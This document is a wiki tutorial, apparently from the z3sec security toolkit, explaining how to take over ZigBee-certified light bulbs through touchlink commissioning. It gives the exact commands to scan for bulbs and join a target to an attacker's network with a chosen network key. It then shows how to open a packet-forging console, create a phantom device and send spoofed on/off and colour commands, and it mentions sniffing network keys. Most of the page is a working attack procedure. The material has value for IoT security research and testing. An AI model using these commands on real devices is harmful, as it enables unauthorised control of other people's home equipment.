-
Notifications
You must be signed in to change notification settings - Fork 19
Tutorial 2: Takeover Attack
This tutorial describes a way to take-over ZigBee-certified light bulbs. The goal is to join the bulb, denoted as target, to the network of the attacker. In the second step, we want to change the color of the light (assuming that the bulb supports colored light).
We assume the usage of an USRP as radio transceiver. If you are using a KillerBee radio (e.g., connected to /dev/ttyUSB0), please substitute --sdr with --kb /dev/ttyUSB0.
First of all, scan for touchlink-enabled devices:
z3sec_touchlink --sdr -c all scan
Then choose a target device.
Please note that this attack requires knowledge of the ZLL Master Key. Please provide this key in ~/.config/z3sec/touchlink_crypt.ini.
To join the target device to the attackers network, please run following command:
z3sec_touchlink --sdr -c all join --target EE:EE:28:0D:55:F1:98:1E --channel_new 25 --addr_new 0x1234 --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF
This command scans for the target on all channels, and if a device was found, joins the device (now referred to as address 0x1234) to the network with a random PAN ID on channel 25 and sets the network key to 0xA0A1A2A3A4A5A6A7A8A9AAABACADAEAF. The new configuration (channel, 16-bit device address, 128-bit network key) can be set to any arbitrary value.
Alternatively, the network key for an already existing network might be obtained by sniffing touchlink commissioning traffic using the z3sec_key_extract tool.
To get the PAN ID of the attacker's network, scan for devices on the channel of this network:
z3sec_touchlink --sdr -c 25 scan
The output shows the PAN ID of the attacker's network.
In order to control the target, use following command:
z3sec_control --sdr -c 25 --pan_id 0xABCD --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF
Please note that the parameters need to match the configuration of the attackers network.
Now, a Scapy interface opens that should look like this:
Z3sec control console (utilizing IPython):
In [1]:
To show a list of all available device, please enter:
In [x]: show()
It might be necessary to wait 1-2 minutes after power-up before devices are discovered and displayed.
(Make sure that all addresses, sequence numbers (except zdp_sqn), and frame counters of a device are discovered before using it for spoofing.)
The output should look like this:
Network: 0
pan_id: 0xABCD
ext_pan_id: DE:FE:C8:ED:DE:FE:C8:ED
network_key: a0a1a2a3a4a5a6a7a8a9aaabacadaeaf
# Devices: 2
# |addr |ext_addr |mac_sqn |nwk_sqn |sec_fc |aps_fc |zcl_sqn |zdp_sqn |
=========================================================================================
0 |0xBAAD |DD:FF:88:0D:EE:FF:CC:66 |148 |229 |8323398 |3298 |23 |None |
1 |0xFA11 |EE:EE:28:0D:55:F1:98:1E |38 |112 |7249729 |2384 |6 |None |
A phantom device might be needed if there is not other device in the network except the target. The phantom device is a virtual device that sends the commands to the target.
To create a phantom device for the network with the number 0, please run following command:
In [x]: create_phantom_device(0)
A new device should show up in the network when executing the show() command.
The general structure of sending a command looks like this:
send(<network ID>, <source device ID>, <destination device ID>, <command>)
In our case, network ID is 0, source device ID is 1, and destination device ID is 0.
Now, we want to turn the target on and off. Thus, we use the phantom device to send commands to the target.
Turn off:
In [x]: send(0,1,0, pkt_off)
Turn on:
In [x]: send(0,1,0, pkt_on)
If the target is not responding, please run this command multiple times.
To change the color of the target, please run following command:
In [x]: send(0,1,0, pkt_red)
The command pkt_red can also be substituted with pkt_blue, pkt_green, and pkt_white.
Please note that these commands only work for bulbs that support colored light. If the target is not responding, please run this command multiple times.
Other ZigBee packets can be forged inside the control console using the Scapy interface.